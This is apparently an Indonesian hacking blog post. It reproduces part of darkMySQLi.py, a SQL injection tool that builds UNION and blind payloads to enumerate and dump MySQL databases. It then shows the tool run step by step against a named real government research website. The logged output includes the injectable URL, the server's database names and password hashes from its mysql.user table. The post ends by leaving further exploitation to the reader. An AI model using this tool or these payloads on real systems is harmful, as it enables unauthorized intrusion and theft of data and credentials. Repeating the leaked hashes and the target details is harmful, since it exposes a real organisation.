if len(match) > 0:
print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
#Build URLS for each different mode
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
if arg_blind == "--blind":
print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
count_URL = site+"+and+((SELECT+COUNT(table_name)"
count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+table_name"
line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
else:
print "[+] Showing Tables & Columns from database \""+arg_database+"\""
file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
arg_row = "Tables"
if arg_database != "None" and arg_table != "None":
if arg_blind == "--blind":
print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
count_URL = site+"+and+((SELECT+COUNT(column_name)"
count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+column_name"
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
else:
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
arg_row = "Columns"
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
if arg_blind == "--blind":
darkc0de = ""
for column in arg_columns:
darkc0de += column+",0x3a,"
darkc0de = darkc0de.rstrip("0x3a,")
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table
else:
for column in arg_columns:
darkc0de += column+",0x1e,"
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
if arg_where != "" or arg_orderby != "":
if arg_where != "":
arg_where = arg_where.split(",")
print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
if arg_orderby != "":
arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
print "[+] ORDERBY clause:",arg_orderby
count_URL += "+"+arg_where
line_URL += "+"+arg_where+"+"+arg_orderby
if version[0] == 4:
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table
elif mode == "--full":
print "[+] Starting full SQLi information_schema enumeration..."
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
if arg_blind == "--blind":
count_URL = site+"+and+((SELECT+COUNT(schema_name)"
count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+schema_name"
line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
else:
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
arg_row = "Databases"
if arg_blind == "--blind":
count_URL+="))"
line_URL+="+LIMIT+"
else:
count_URL += arg_end
line_URL += "+LIMIT+NUM,1"+arg_end
## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it...
if mode == "--info" and arg_blind == "--blind":
head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
else:
yesno = "NO"
print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
print "\n[+] Showing database version, username@location, and database name!"
file.write("\n\n[+] Showing database version, username@location, and database name!")
line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
row_value = 1
#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
if arg_blind == "--blind":
row_value = GuessValue(count_URL)
else:
source = GetThatShit(count_URL)
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
## UNION Schema Enumeration and DataExt loop
if arg_blind == "--union":
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
while int(table_num) != int(row_value):
try:
source = GetThatShit(line_URL.replace("NUM",str(num)))
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema" or mode == "--full":
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
if table_num == 0:
print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
else:
print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
print "[Table: Columns]";file.write("[Table: Columns]\n")
if cur_table != match[1]:
print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2])
cur_table = match[1]
#table_num+=1
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
if table_num == 0:
print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
else:
print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
table_num+=1
#Collect data from tables & columns
elif mode == "--dump":
match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
if match == []:
match = ['']
else:
match = match[0].strip("\x1e").split("\x1e")
if arg_rowdisp == 1:
print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",)
else:
print;file.write("\n")
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
sys.stdout.flush()
table_num+=1
else:
if mode == "--dump":
table_num+=1
sys.stdout.write("\n[%s] No data" % (num))
file.write("\n[%s] No data" % (num))
break
num+=1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
## Blind Schema Enumeration and DataExt loop
if arg_blind == "--blind":
if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
lower_bound = 0
upper_bound = 127
print
for data_row in range(int(num), row_value):
sys.stdout.write("[%s]: " % (lim_num))
file.write("\n[%s]: " % (lim_num))
sys.stdout.flush()
value = chr(upper_bound)
while value != chr(0):
if mode == "--info":
Guess_URL = line_URL + str(let_pos)+",1))"
else:
Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
value = chr(GuessValue(Guess_URL))
sys.stdout.write("%s" % (value))
file.write(value)
sys.stdout.flush()
let_pos+=1
print
lim_num = int(lim_num) + 1
let_pos = 1
data_row+=1
#Lets wrap it up!
if mode == "--schema" or mode == "--full" or mode == "--dump":
print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
else:
print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"
file.close()atau download source-code nya disini atau disini.
target kali ini adalah http://www.inovasi.lipi.go.id/hki/news/news.php?id=37
caranya:
C:\Python25>darkmysqli.py --findcol -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37
[+] 13:16:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Building Proxy List...
Proxy:127.0.0.1:9666 - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,5,6,
[+] Column Length is: 6
[+] Found null column at column #: 3,5,6,
[!] SQLi URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,3,4,5,6--
[!] darkMySQLi URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--
[-] [13:16:23]
[-] Total URL Requests: 6
[-] Done
C:\Python25>darkmysqli.py --info -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de
[+] 13:17:37
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
Proxy:127.0.0.1:9666 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: sean1
User: root@localhost
Version: 5.0.51a-24+lenny1
[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[+] Dumping MySQL user info. host:user:password
[+] Number of users in the mysql.user table: 6 [0] localhost:root:*FBB2F1A7A07597D81C29AC53EB2634032F634CDE [1] pusinov:root:*FBB2F1A7A07597D81C29AC53EB2634032F634CDE [2] 127.0.0.1:root:*FBB2F1A7A07597D81C29AC53EB2634032F634CDE [3] localhost:debian-sys-maint:*BBEFC3D4873B792A18EABB33ADF4B97C3B57DB48 [4] pusinov:admin:*8FCC004418F144E3AF026CF0C932380CD6FBB687 [5] localhost:admin:*8FCC004418F144E3AF026CF0C932380CD6FBB687 [+] Do we have Access to Load_File: YES <-- w00t w00t [-] [13:18:06] [-] Total URL Requests: 11
[-] Done
C:\Python25>darkmysqli.py --dbs -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de
[+] 13:19:50
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[+] Building Proxy List...
Proxy:127.0.0.1:9666 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: sean1
User: root@localhost
Version: 5.0.51a-24+lenny1
[+] Showing all databases current user has access too!
[+] Number of Databases: 7
[1] cobajoomla
[2] dbm00dl3
[3] joomla11
[4] mikroorganisme
[5] mysql
[6] sean1
[7] wpdb_1n0v4s1
[-] [13:20:02]
[-] Total URL Requests: 9
[-] Done
Selanjutnya terserah anda :)
Langganan:
Postingan (Atom)
Statistics
